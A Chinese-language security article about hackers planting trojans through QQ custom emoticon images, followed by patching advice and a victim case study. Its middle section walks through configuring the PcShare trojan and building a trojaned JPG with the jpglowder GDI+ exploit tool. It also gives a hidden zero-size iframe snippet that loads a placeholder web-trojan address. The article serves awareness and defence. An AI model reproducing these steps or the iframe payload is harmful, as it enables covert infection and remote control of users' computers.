相信QQ是廣大網友都非常熟悉的聊天工具了。有相當一部分朋友對於QQ的自定義表情非常喜愛,甚至自己製作個性化的自定義表情共用給大家。但是在我們享受各種個性化表情的時候,駭客也通過這些表情圖片悄悄地潛入我們的系統種植木馬,讓我們防不勝防。我們該如何應對,下麵我們就一起來揭穿隱藏在QQ自定義表情背後的陰謀。www.sq120.com推薦
自定義表情的利用
知道了這個原理後,下麵我們就一步一步地來重複通過圖片種植木馬的操作。
第1步:配置木馬程式
首先要配置一個木馬的服務端程式,通過這個程式就可以進行遠程電腦的控制。我這裏是利用國產木馬PcShare。
運行PcShare.exe後,點擊工具欄的“生成客戶”按鈕,在彈出的“生成被控制端執行程式”的窗口中進行設置(圖1)。最後點擊“生成”按鈕,就能生成一個配置好的木馬服務端程式了,接著將服務端程式上傳到我申請好的網路空間中。
第2步:生成圖片木馬
要想通過自定義表情來進行木馬的種植,有兩種方法,它們分別是通過漏洞、HTML代碼進行製作,下麵就分別對這兩種方法進行分析說明。
1.利用漏洞種植木馬
這種方法是通過Windows系統以及應用程式的漏洞而產生的,比如2004年的“Windows GDI+ JPG解析組件緩衝區溢出漏洞”、“Windows圖形渲染引擎安全漏洞”,2005年的“MSN Messenger PNG圖片解析遠程代碼執行漏洞”,以及今年的“Windows圖形渲染引擎WMF格式代碼執行漏洞”都是和圖形圖像有關的漏洞。
下麵就以“Windows GDI+ JPG解析組件緩衝區溢出漏洞”為例,為大家講解圖片木馬的生成過程。
在命令提示符下啟動漏洞利用工具jpglowder,查看工具的使用方法(如圖2)。漏洞利用工具包含了多個命令參數。
要利用這個漏洞生成圖片木馬,只要使用工具內置參數“d”即可,通過輸入一段含有木馬的網頁鏈接,就可以生成需要的圖片木馬。
2.利用HTML代碼種植木馬
這種利用HTML代碼製作的圖片木馬,其實就是傳統的網頁木馬的一種變種而已。打開記事本程式輸入如下代碼,並將代碼另存為plmm.jpg。
<html><body>
<iframe src="網頁木馬地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="真實的圖片地址"></img></center>
</body></html>
這裏通過一個跳轉命令連鏈到一個網頁木馬的地址。
定點防範,找准關鍵
其實,通過圖片進行木馬傳播已經是個老技術了。但是現在駭客通過QQ的自定義表情來主動種植木馬還是要引起我們的高度重視。
我們可以看到,圖片木馬和網頁木馬一樣,要利用系統的漏洞才能被種植進系統,所以我們可以發現,方俊朋友在安裝了各種殺毒軟體和防火牆後,沒有及時打上系統漏洞補丁,才讓駭客有可乘之機。
所以我們防範通過QQ自定義表情來種植木馬的關鍵就是及時為系統打上漏洞補丁(大家可以根據自己系統情況到http://www.microsoft.com下載相應補丁包),即使是不能在第一時間安裝系統的安全補丁,也可以通過使用第三方提供的補丁進行防範。
案例回放
姓名:方俊
年齡:20歲
案發時間:2006年2月20日
2月20日,方俊的一個網友通過QQ的臨時聊天功能同他聊天。後來網友向方俊發送了很多QQ表情,當時方俊並沒有在意,只是覺得這些圖片很好玩。
第二天打開電腦沒多久,方俊就覺得電腦運行越來越慢。通過殺毒軟體殺毒也沒有發現可疑的程式。後來系統越來越慢,而且常常出現“假死”現象,經過他的詳細分析和一系列操作後,順利清除了系統中的木馬。
後來在安全專家指導下,在QQ的自定義表情中,找到的別人傳給他的自定義表情圖片中攜帶的木馬。原來,QQ的自定義表情成了駭客入侵的通道。
案情分析:一個小小的QQ是如何被駭客利用成為入侵電腦的通道的呢?其實QQ的自定義表情傳送的就是圖片,那麼也就容易理解這其實就是一個運用圖片種植木馬的伎倆。
QQ的自定義表情傳送的實質上是圖片。這些經過特殊加工的圖片,再發給遠程用戶以後,圖片首先會判斷系統是否存在相應的漏洞。如果存在漏洞分塊,圖片就會啟動這個漏洞,然後執行圖片所攜帶的惡意代碼,從而最終成功控制遠程電腦。 |
